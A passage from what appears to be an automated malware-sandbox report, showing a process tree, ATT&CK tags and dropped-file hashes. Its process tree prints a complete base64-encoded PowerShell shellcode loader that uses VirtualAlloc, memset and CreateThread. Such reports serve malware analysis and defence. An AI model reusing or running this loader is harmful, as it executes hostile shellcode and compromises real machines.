eAA2ADgALAAwAHgAYgBjACwAMAB4AGYANgAsADAAeABmADYALAAwAHgAMQAzACwAMAB4ADQAMQAsADAAeAAyADMALAAwAHgAOAAzACwAMAB4ADIAMwAsADAAeABjADgALAAwAHgAZABhACwAMAB4AGUANAAsADAAeAAyAGIALAAwAHgAMgAwACwAMAB4AGUAMwAsADAAeABmADQALAAwAHgANAAzACwAMAB4ADAAMwAsADAAeAAxADMALAAwAHgAYwAxACwAMAB4ADcAMwAsADAAeAA3ADQALAAwAHgAMAA2ACwAMAB4ADYANQAsADAAeAAwADYALAAwAHgANAA2ACwAMAB4AGMAMQAsADAAeAA4AGEALAAwAHgANQBkACwAMAB4AGYAYQAsADAAeAA0ADQALAAwAHgAOQA0ACwAMAB4ADQAOAAsADAAeAA5ADEALAAwAHgAMgA4ACwAMAB4ADAAMgAsADAAeAA3ADIALAAwAHgANwA2ACwAMAB4AGEAOQAsADAAeABkADIALAAwAHgAMQBhACwAMAB4ADcANgAsADAAeABhADkALAAwAHgAOQAyACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgAYwAxACwAMAB4ADQAYQAsADAAeAA3AGUALAAwAHgAOQBhACwAMAB4AGYANAAsADAAeAA5ADQALAAwAHgAYQBiACwAMAB4ADgAZQAsADAAeABhADQALAAwAHgAMwA5ACwAMAB4AGQAYQAsADAAeAA1ADYALAAwAHgAMQBkACwAMAB4AGQANgAsADAAeABkAGMALAAwAHgAYgA4ACwAMAB4AGEAMgAsADAAeAAyADYALAAwAHgAOABmACwAMAB4AGUAZQAsADAAeABjAGEALAAwAHgAMwA0ACwAMAB4AGIAOQAsADAAeAA4ADYALAAwAHgAZQA5ACwAMAB4AGMANgAsADAAeAAxADAALAAwAHgAMQBkACwAMAB4ADIAZAAsADAAeAA0AGMALAAwAHgANQA3ACwAMAB4ADkANQAsADAAeABhADkALAAwAHgAYQBjACwAMAB4AGEANAAsADAAeAAyAGYALAAwAHgANwA1ACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgANgA4ACwAMAB4AGIANQAsADAAeAA3AGIALAAwAHgAZQA3ACwAMAB4AGUAMAAsADAAeABjADYALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeABjADMALAAwAHgAMAAxACwAMAB4AGIANgAsADAAeABkADgALAAwAHgAMQA1ACwAMAB4ADQANAAsADAAeAA4AGUALAAwAHgAMABhACwAMAB4ADYAZQAsADAAeAA5ADAALAAwAHgAYwAwACwAMAB4ADYAMwAsADAAeABiAGMALAAwAHgAZAA4ACwAMAB4ADEAYwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAUQBpAHAAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFEAaQBwAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABRAGkAcAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEARQBPACkAKQA7ACQAZgBkAEkAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBpAHcAdAAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABlAGkAdwB0ACAAJABmAGQASQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABmAGQASQAgACQAZQAiADsAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3660
    - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JAByAFkAdQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHIAWQB1ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZgAsADAAeAA1ADkALAAwAHgANwA0ACwAMAB4ADYANgAsADAAeAAzADEALAAwAHgAZABhACwAMAB4AGQAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBhACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwBhACwAMAB4ADEANQAsADAAeAAwADMALAAwAHgANwBhACwAMAB4ADEANQAsADAAeAA4ADMALAAwAHgAZQBhACwAMAB4AGYAYwAsADAAeABlADIALAAwAHgAYQBjACwAMAB4ADgAOAAsADAAeAA4AGUALAAwAHgAYgBlACwAMAB4ADQAZQAsADAAeAA3ADEALAAwAHgANABmACwAMAB4AGEAMQAsADAAeABjADcALAAwAHgAOQA0ACwAMAB4ADcAZQAsADAAeABmADMALAAwAHgAYgAzACwAMAB4AGQAZAAsADAAeABkADMALAAwAHgAYwAzACwAMAB4AGIAMAAsADAAeABiADAALAAwAHgAZABmACwAMAB4AGEAOAAsADAAeAA5ADQALAAwAHgAMgAwACwAMAB4AGUAZgAsADAAeAAxADkALAAwAHgANQAyACwAMAB4ADYAZgAsADAAeAA2ADQALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeAA1AGUALAAwAHgAOAA1ACwAMAB4AGUAOQAsADAAeAA0AGEALAAwAHgAMABjACwAMAB4ADQANQAsADAAeAA2AGIALAAwAHgAMwA2ACwAMAB4ADQAZgAsADAAeAA5AGEALAAwAHgANABiACwAMAB4ADAANwAsADAAeAA4ADAALAAwAHgAZQBmACwAMAB4ADgAYQAsADAAeAA0ADAALAAwAHgANQA2ACwAMAB4ADgANQAsADAAeAA2ADMALAAwAHgAMQBjACwAMAB4ADMAZQAsADAAeABlAGUALAAwAHgAMgBlACwAMAB4AGIAMAAsADAAeAA0AGIALAAwAHgAYgAyACwAMAB4AGYAMgAsADAAeABiADEALAAwAHgAOQBiACwAMAB4AGIAOAAsADAAeAA0AGIALAAwAHgAYwA5ACwAMAB4ADkAZQAsADAAeAA3AGYALAAwAHgAMwBmACwAMAB4ADYANQAsADAAeABhADAALAAwAHgAYQBmACwAMAB4ADkAMAAsADAAeABmAGUALAAwAHgAZQBhACwAMAB4ADUANwAsADAAeAA5AGEALAAwAHgANQA4ACwAMAB4AGMAYgAsADAAeAA2ADYALAAwAHgANABmACwAMAB4AGQAZAAsADAAeABjADIALAAwAHgAMQBkACwAMAB4ADUAMwAsADAAeABlAGMALAAwAHgAMgBiACwAMAB4ADkANAAsADAAeAAyADAALAAwAHgAMwBhACwAMAB4ADUAZgAsADAAeAAyADYALAAwAHgAZQAxACwAMAB4ADcAMwAsADAAeAA5AGYALAAwAHgAOAA1ACwAMAB4AGMAYwAsADAAeABiAGMALAAwAHgAMQAyACwAMAB4AGQANwAsADAAeAAwADkALAAwAHgANwBhACwAMAB4AGMAZAAsADAAeABhADIALAAwAHgANgAxACwAMAB4ADcAOQAsADAAeAA3ADAALAAwAHgAYgA1ACwAMAB4AGIAMQAsADAAeAAwADAALAAwAHgAYQBlACwAMAB4ADMAMAAsADAAeAAyADYALAAwAHgAYQAyACwAMAB4ADIANQAsADAAeABlADIALAAwAHgAOAAyACwAMAB4ADUAMwAsADAAeABlADkALAAwAHgANwA1ACwAMAB4ADQAMAAsADAAeAA1AGYALAAwAHgANAA2ACwAMAB4AGYAMQAsADAAeAAwAGUALAAwAHgANAAzACwAMAB4ADUAOQAsADAAeABkADYALAAwAHgAMgA0ACwAMAB4ADcAZgAsADAAeABkADIALAAwAHgAZAA5ACwAMAB4AGUAYQAsADAAeABmADYALAAwAHgAYQAwACwAMAB4AGYAZAAsADAAeAAyAGUALAAwAHgANQAzACwAMAB4ADcAMgAsADAAeAA5AGYALAAwAHgANwA3ACwAMAB4ADMAOQAsADAAeABkADUALAAwAHgAYQAwACwAMAB4ADYAOAAsADAAeABlADUALAAwAHgAOABhACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAMAA3ACwAMAB4AGQAYwAsADAAeAAzADkALAAwAHgAMABiACwAMAB4AGQAOAAsADAAeABlADEALAAwAHgANgA3ACwAMAB4ADkAYwAsADAAeAA0ADgALAAwAHgANwBiACwAMAB4AGUAYwAsADAAeAA1AGMALAAwAHgAZgBjACwAMAB4AGYANAAsADAAeAA2ADUALAAwAHgAMwAzACwAMAB4ADkANQAsADAAeABhAGUALAAwAHgAMQBkACwAMAB4ADgANwAsADAAeAAxADIALAAwAHgANgA5ACwAMAB4AGQAOQAsADAAeABlADgALAAwAHgAMAA5ACwAMAB4ADQANAAsADAAeAAzAGUALAAwAHgANAA1ACwAMAB4AGUAMgAsADAAeABmADQALAAwAHgAOQAzACwAMAB4ADMAOQAsADAAeAA2AGMALAAwAHgAYwAxACwAMAB4ADQANQAsADAAeABjADcALAAwAHgAYwBiACwAMAB4AGMAYQAsADAAeABiAGYALAAwAHgANgA0ACwAMAB4ADQAMAAsADAAeAA1AGYALAAwAHgANAAzACwAMAB4AGQAOAAsADAAeAAzADUALAAwAHgAZgA3ACwAMAB4AGQAMwAsADAAeABjADEALAAwAHgAYgA5ACwAMAB4ADAANwAsADAAeAAzAGMALAAwAHgANABkACwAMAB4AGIAOQAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4ADgAMQAsADAAeABkADcALAAwAHgANgBlACwAMAB4AGUANQAsADAAeABhAGMALAAwAHgANwA0ACwAMAB4ADMAMwAsADAAeAA3AGMALAAwAHgAMQA5ACwAMAB4ADEANgAsADAAeABjAGIALAAwAHgAMABhACwAMAB4AGQAYwAsADAAeAA4ADMALAAwAHgANAA1ACwAMAB4AGIAZAAsADAAeAAyADkALAAwAHgAMABkACwAMAB4AGQAMQAsADAAeAAxADkALAAwAHgAMwBmACwAMAB4AGMANgAsADAAeABiADQALAAwAHgAZAA4ACwAMAB4AGYANQAsADAAeABkADAALAAwAHgANABjACwAMAB4AGIANAAsADAAeAA0AGEALAAwAHgANwA1ACwAMAB4AGIAMQAsADAAeAAxAGEALAAwAHgAMgA1ACwAMAB4ADIAMgAsADAAeAAzADgALAAwAHgAMAA1ACwAMAB4ADcAMwAsADAAeAAzADMALAAwAHgAZQBmACwAMAB4AGIAMwAsADAAeABiAGEALAAwAHgAOQA4ACwAMAB4ADcAOAAsADAAeABjADQALAAwAHgANwAwACwAMAB4AGYANgAsADAAeABmAGQALAAwAHgAOQA3ACwAMAB4ADIANwAsADAAeAA1ADUALAAwAHgAYQA5ACwAMAB4ADQANAAsADAAeAA5AGUALAAwAHgAMwAxACwAMAB4AGIAZQAsADAAeAAzAGUALAAwAHgAMwAwACwAMAB4AGYAYQAsADAAeABiAGYALAAwAHgAMQA0ACwAMAB4AGQAYQAsADAAeAA5ADYALAAwAHgAMwA1ACwAMAB4AGMAOAAsADAAeAA4AGIALAAwAHgAZQA2ACwAMAB4ADcAOQAsADAAeABmADYALAAwAHgANABiACwAMAB4ADYAZgAsADAAeAA5AGQALAAwAHgAOQBjACwAMAB4ADQAZgAsADAAeAAzAGYALAAwAHgAMwA0ACwAMAB4ADcAZQAsADAAeAAwADYALAAwAHgAZAA3ACwAMAB4AGIAZAAsADAAeABjADYALAAwAHgAMwA4ACwAMAB4AGEAMQAsADAAeABjADEALAAwAHgAMQAyACwAMAB4ADEANwAsADAAeABmAGUALAAwAHgANgBlACwAMAB4AGMAZQAsADAAeABjAGUALAAwAHgANgA4ACwAMAB4AGIAYwAsADAAeABmADYALAAwAHgAZgA2ACwAMAB4ADEAMwAsADAAeAA0ADEALAAwAHgAMgAzACwAMAB4ADgAMwAsADAAeAAyADMALAAwAHgAYwA4ACwAMAB4AGQAYQAsADAAeABlADQALAAwAHgAMgBiACwAMAB4ADIAMAAsADAAeABlADMALAAwAHgAZgA0ACwAMAB4ADQAMwAsADAAeAAwADMALAAwAHgAMQAzACwAMAB4AGMAMQAsADAAeAA3ADMALAAwAHgANwA0ACwAMAB4ADAANgAsADAAeAA2ADUALAAwAHgAMAA2ACwAMAB4ADQANgAsADAAeABjADEALAAwAHgAOABhACwAMAB4ADUAZAAsADAAeABmAGEALAAwAHgANAA0ACwAMAB4ADkANAAsADAAeAA0ADgALAAwAHgAOQAxACwAMAB4ADIAOAAsADAAeAAwADIALAAwAHgANwAyACwAMAB4ADcANgAsADAAeABhADkALAAwAHgAZAAyACwAMAB4ADEAYQAsADAAeAA3ADYALAAwAHgAYQA5ACwAMAB4ADkAMgAsADAAeABkAGEALAAwAHgAMgA1ACwAMAB4AGMAMQAsADAAeAA0AGEALAAwAHgANwBlACwAMAB4ADkAYQAsADAAeABmADQALAAwAHgAOQA0ACwAMAB4AGEAYgAsADAAeAA4AGUALAAwAHgAYQA0ACwAMAB4ADMAOQAsADAAeABkAGEALAAwAHgANQA2ACwAMAB4ADEAZAAsADAAeABkADYALAAwAHgAZABjACwAMAB4AGIAOAAsADAAeABhADIALAAwAHgAMgA2ACwAMAB4ADgAZgAsADAAeABlAGUALAAwAHgAYwBhACwAMAB4ADMANAAsADAAeABiADkALAAwAHgAOAA2ACwAMAB4AGUAOQAsADAAeABjADYALAAwAHgAMQAwACwAMAB4ADEAZAAsADAAeAAyAGQALAAwAHgANABjACwAMAB4ADUANwAsADAAeAA5ADUALAAwAHgAYQA5ACwAMAB4AGEAYwAsADAAeABhADQALAAwAHgAMgBmACwAMAB4ADcANQAsADAAeABkAGIALAAwAHgAYwBmACwAMAB4ADYAOAAsADAAeABiADUALAAwAHgANwBiACwAMAB4AGUANwAsADAAeABlADAALAAwAHgAYwA2ACwAMAB4ADcAYgAsADAAeAAwADgALAAwAHgAYwAzACwAMAB4ADAAMQAsADAAeABiADYALAAwAHgAZAA4ACwAMAB4ADEANQAsADAAeAA0ADQALAAwAHgAOABlACwAMAB4ADAAYQAsADAAeAA2AGUALAAwAHgAOQAwACwAMAB4AGMAMAAsADAAeAA2ADMALAAwAHgAYgBjACwAMAB4AGQAOAAsADAAeAAxAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFEAaQBwAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABRAGkAcAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAUQBpAHAALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3736
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wy5dkyen\wy5dkyen.cmdline"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2244
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC85.tmp" "c:\Users\Admin\AppData\Local\Temp\wy5dkyen\CSC6054352C60C6433F8FBF21C6F8A5D127.TMP"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CCB6.tmp\CCB7.tmp\CCB8.bat

Filesize
8KB

MD5
b165bd278dba5b19d81ba2cd094ac137

SHA1
c3408b1b563d7cfc83907c0fbeab7dee8c6c1e65

SHA256
0bebb0ff617d53c10c9212b6851375a3e4dec5b7c161602f5582bc8930cdb03a

SHA512
af82d76f0ed87c1b93765ebbb2b14f0aad82fe2aef8021c3b828f2cf9141c51866d1d1c92f18fd83aaa6c7840db85ddb9ea9f1d95a085dcbbefd6f2533ff0931

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDC85.tmp

Filesize
1KB

MD5
53ffb438ce333894d7c521272f34ed0c

SHA1
932ee758fe60a6bee00187af7bf43c1a19bba19e

SHA256
fd88d674b1a54fc621ac4fd0e7e53090e77bfc4f8af2fcdda3c4d16cddcd55c4

SHA512
9d604f5f62efe91afbf07c480ccef3605ccfc253800495384749e5aa34f7f9527ce490e24389bcc1ba4ad7c7833f59e3560856c392c7dcacd69aeddac6c77134

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tif34rey.pog.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wy5dkyen\wy5dkyen.dll

Filesize
3KB

MD5
b2314c042b5fa20ff9bac473b6b47865

SHA1
e886a51f389065d3aca453f288311eb524eeb645

SHA256
69998eed64d5f665ca36ef83f6b0b8f8d175657eead75bd4f38ed4b007657519

SHA512
00784bcc25610afa6b46c8aa3996e225b071836020f6952d883481c6a0402e86942b7ecdea0ddff66c1328aa26db461804f947c75a301979dfb4a22005ff13e7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wy5dkyen\CSC6054352C60C6433F8FBF21C6F8A5D127.TMP

Filesize
652B

MD5
14a441910aa67ce95d6bb90a998b8143

SHA1
1b5ac8760de597ad25f8d54a315799bdbbb7a923

SHA256
60a25fc1e9ad11ce1323817d700238230a836ff67a7f7737c55affbcc1314a7e

SHA512
0dd62687acf3281a8c4e7b42564f152ada94074f197c4be976dc96fa7b5e29021d3e0e0b6c68a630b3d1ebb66527795c7b30bbf5a22a4639c3294d21f9afc541

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wy5dkyen\wy5dkyen.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wy5dkyen\wy5dkyen.cmdline

Filesize
369B

MD5
1061ab3fb6cf51b6cceafcabe650bbac

SHA1
eadabd3f1b4fd63576e96983b75a7dc1343f20a4

SHA256
f21259d9fe01384e385bdfc5edac628b7fc90408285909f5ddacc274783025d0

SHA512
c5ad4a9657adb068aeed69b4ebf1aff5cd838579df4fb90aea98abb2187a777d5f91df31b91ce614cf3a74d24bd6b51ee6bb6fb561e03df8e68b6272ce01bb28

Download Submit
memory/544-13-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

Filesize
10.8MB

Download
memory/544-14-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

Filesize
10.8MB

Download
memory/544-62-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

Filesize
10.8MB

Download
memory/544-3-0x0000021A69B20000-0x0000021A69B42000-memory.dmp

Filesize
136KB

Download
memory/544-61-0x00007FFA2FD73000-0x00007FFA2FD75000-memory.dmp

Filesize
8KB

Download
memory/544-2-0x00007FFA2FD73000-0x00007FFA2FD75000-memory.dmp

Filesize
8KB

Download
memory/3660-16-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

Filesize
10.8MB

Download
memory/3660-17-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

Filesize
10.8MB

Download
memory/3660-63-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

Filesize
10.8MB

Download
memory/3660-15-0x00007FFA2FD70000-0x00007FFA30831000-memory.dmp

Filesize
10.8MB

Download
memory/3736-30-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/3736-45-0x0000000006A40000-0x0000000006A5A000-memory.dmp

Filesize
104KB

Download
memory/3736-31-0x0000000005E70000-0x0000000005ED6000-memory.dmp

Filesize
408KB

Download
memory/3736-37-0x0000000005F10000-0x0000000006264000-memory.dmp

Filesize
3.3MB

Download
memory/3736-29-0x0000000005670000-0x0000000005692000-memory.dmp

Filesize
136KB

Download
memory/3736-28-0x0000000005720000-0x0000000005D48000-memory.dmp

Filesize
6.2MB

Download
memory/3736-27-0x0000000002F40000-0x0000000002F76000-memory.dmp

Filesize
216KB

Download
memory/3736-58-0x0000000006AC0000-0x0000000006AC8000-memory.dmp

Filesize
32KB

Download
memory/3736-60-0x0000000005290000-0x0000000005291000-memory.dmp

Filesize
4KB

Download
memory/3736-44-0x0000000007D80000-0x00000000083FA000-memory.dmp

Filesize
6.5MB

Download
memory/3736-43-0x0000000006560000-0x00000000065AC000-memory.dmp

Filesize
304KB

Download
memory/3736-42-0x0000000006530000-0x000000000654E000-memory.dmp

Filesize
120KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads